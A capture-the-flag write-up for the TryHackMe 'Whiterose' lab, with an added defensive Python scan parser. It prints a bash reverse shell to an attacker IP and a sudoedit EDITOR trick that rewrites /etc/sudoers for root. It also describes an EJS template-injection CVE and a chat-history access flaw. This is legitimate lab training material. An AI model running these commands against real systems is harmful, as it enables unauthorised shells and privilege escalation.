Whiterose (THM)
Yet another Mr. Robot themed challenge.
Intro.
Welcome everyone, once again we have another Mr. Robot themed machine by TryHackMe. So excited.
Enumeration.
Port Scan.
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 b9:07:96:0d:c4:b6:0c:d6:22:1a:e4:6c:8e:ac:6f:7d (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCddbej9ZSf75uuDvLDeym5AYM+loP/3W862HTWjmksh0UuiuIz8UNTrf3ZpgtBej4y3E3EKvOmYFvJHZpFRV/hQBq1oZB3+XXVzb5RovazcnMgvFxI4y5nCQM8qTW09YvBOpzTyYmsKjVRJOfLR+F87g90vNdZ/u8uVl7IH0B6NmhGlCjPMVLRmhz7PuZih38t0WRWPruEY5qGliW0M3ngZXL6MmL1Jo146HtM8GASdt6yV9U3GLa3/OMFVjYgysqUQPrMwvUrQ8tIDnRAH1rsKBxDFotvcfW6mJ1OvojQf8PEw7iI/PNJZWGzkg+bm4/k+6PRjO2v/0V98DlU+gnn
| 256 ba:ff:92:3e:0f:03:7e:da:30:ca:e3:52:8d:47:d9:6c (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNMBr/zXjVQItMqdVH12/sZ3rIt2XFsPWRCy4bXCE7InUVg8Q9SVFkOW2LAi1UStP4A4W8yA8hW+1wJaEFP9ffs=
| 256 5d:e4:14:39:ca:06:17:47:93:53:86:de:2b:77:09:7d (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIIdJAkvDVqEAbac77yxYfkM0AU8puWxCyqCBJ9Pd9zCi
80/tcp open http syn-ack ttl 63 nginx 1.14.0 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
As usual we have SSH and HTTP open; let's see what we have on HTTP.
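The scan above, as an added example that is not part of the original write-up: a small Python parser that pulls the open ports, product versions and SSH host-key fingerprints out of `nmap -sV --reason` output and flags anything below a version baseline, which is the inventory a defender needs before acting on the "update your packages" lesson at the end. The baseline values in the call at the bottom are a constructed example policy, not vendor guidance.

```python
import re
from dataclasses import dataclass, field
# Constructed sample: the port lines of the scan above (long host-key blobs left out).
SAMPLE_SCAN = """\
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 b9:07:96:0d:c4:b6:0c:d6:22:1a:e4:6c:8e:ac:6f:7d (RSA)
80/tcp open http syn-ack ttl 63 nginx 1.14.0 (Ubuntu)
"""

PORT_RE = re.compile(r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<name>\S+)\s+"
                     r"(?P<reason>\S+(?:\s+ttl\s+\d+)?)\s*(?P<banner>.*)$")
HOSTKEY_RE = re.compile(r"^\|\s+\d+\s+(?P<fp>(?:[0-9a-f]{2}:){15}[0-9a-f]{2})\s+\((?P<kind>\w+)\)$")
PRODUCT_RE = re.compile(r"^(?P<product>\S+)\s+(?P<version>\d[\w.]*)")  # "nginx 1.14.0 (Ubuntu)"

@dataclass
class Service:
    port: int
    proto: str
    name: str
    product: str = ""
    version: str = ""
    hostkeys: dict = field(default_factory=dict)  # key type -> MD5 fingerprint

def parse_scan(text):
    """Turn `nmap -sV --reason` output into Service records (open ports only)."""
    services = []
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m and m["state"] == "open":
            svc = Service(int(m["port"]), m["proto"], m["name"])
            if p := PRODUCT_RE.match(m["banner"]):
                svc.product, svc.version = p["product"], p["version"]
            services.append(svc)
        elif (k := HOSTKEY_RE.match(line)) and services:
            services[-1].hostkeys[k["kind"]] = k["fp"]  # script output follows its port
    return services

def _vkey(version):  # numeric prefix as a tuple: '7.6p1' -> (7, 6), '1.14.0' -> (1, 14, 0)
    return tuple(int(x) for x in re.match(r"\d+(?:\.\d+)*", version)[0].split("."))

def outdated(services, minimums):
    """Services whose version is below the baseline in `minimums` (product -> min version)."""
    return [f"{s.product} {s.version} < {minimums[s.product]}" for s in services
            if s.product in minimums and _vkey(s.version) < _vkey(minimums[s.product])]

if __name__ == "__main__":
    # Baseline below is a constructed example policy, not vendor guidance.
    print(outdated(parse_scan(SAMPLE_SCAN), {"OpenSSH": "8.0", "nginx": "1.18.0"}))
```

Comparing the stored host-key fingerprints against a previous scan of the same host is a cheap way to notice a rebuilt or spoofed machine.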

Enumerate subdomains.
When I first accessed the site it could not resolve the domain cyprusbank.thm, so I had to add it to the /etc/hosts file. Then I used gobuster to enumerate subdomains and found this.

And we have credentials that were given to access this admin panel; as in the show, Elliot uses her to gain access to the Cyprus National Bank.
Accessing admin panel.

After we access the admin panel we find multiple transactions in the billions.
Accessing admin account.
After a few minutes of playing around I found the chat.

The first thing that interested me on the page was the 'c' argument in the URL, so I played with it and found that it allows access to the chat history.

Using this, 'Gayle Bev' and the password. Yeah, I forgot: we need admin access for the settings; we cannot access the settings as Olivia Cortez.

Using the settings I was able to change the password for 'Tyrell Wellick' to 'password', but this step was no good.

From here I was able to get the phone number for Tyrell Wellick.
Web Shell.
So I thought: why would there be a setting where I can change the password but it does not work? That does not make any sense, right?
So I started playing around and found this.

If we delete the password value from the request it gives us this error, indicating that the password is undefined and also telling us that it uses EJS.
Searching a bit for exploits regarding EJS I found this.
It is a CVE that affects some versions of EJS. Using the payload from the write-up I was able to verify that this version is affected.


So I used a simple reverse shell and uploaded it to the server.
#!/bin/bash
sh -i >& /dev/tcp/10.11.96.110/9001 0>&1

Changing the permissions of the file.

Then we just send the request, and do not forget to set up the listener.

Root Shell.
As for the root shell, it was not that hard.

We can see that we can use sudoedit to edit a config file; let's see if we can take advantage of this.
This repo shows a CVE which allows us to use a vulnerable version of sudoedit to edit any file, and therefore we can edit the sudoers file to allow us to run any command as root.
export EDITOR="vi -- /etc/sudoers"
sudo sudoedit /etc/nginx/sites-available/admin.cyprusbank.thm
We can use the repo or these two commands to get what we want.

After the edit the file should look like this. Using sudo -l again we can see that we can run anything as root.


Conclusion.
This machine was so good since I love Mr. Robot, and the lesson we can learn is to update our packages as soon as possible. 😂